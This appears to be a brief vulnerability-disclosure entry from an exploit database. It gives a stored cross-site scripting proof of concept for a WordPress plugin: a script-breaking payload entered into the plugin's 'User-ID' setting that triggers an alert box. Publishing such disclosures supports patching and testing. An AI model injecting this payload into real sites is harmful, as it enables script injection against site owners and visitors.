## https://sploitus.com/exploit?id=WPEX-ID:36285052-8464-4FD6-B4B1-C175E730EDAD In the plugin's "User-ID" setting field, enter the payload: "></script><script>alert("XSS")</script> Save the changes and see the XSS.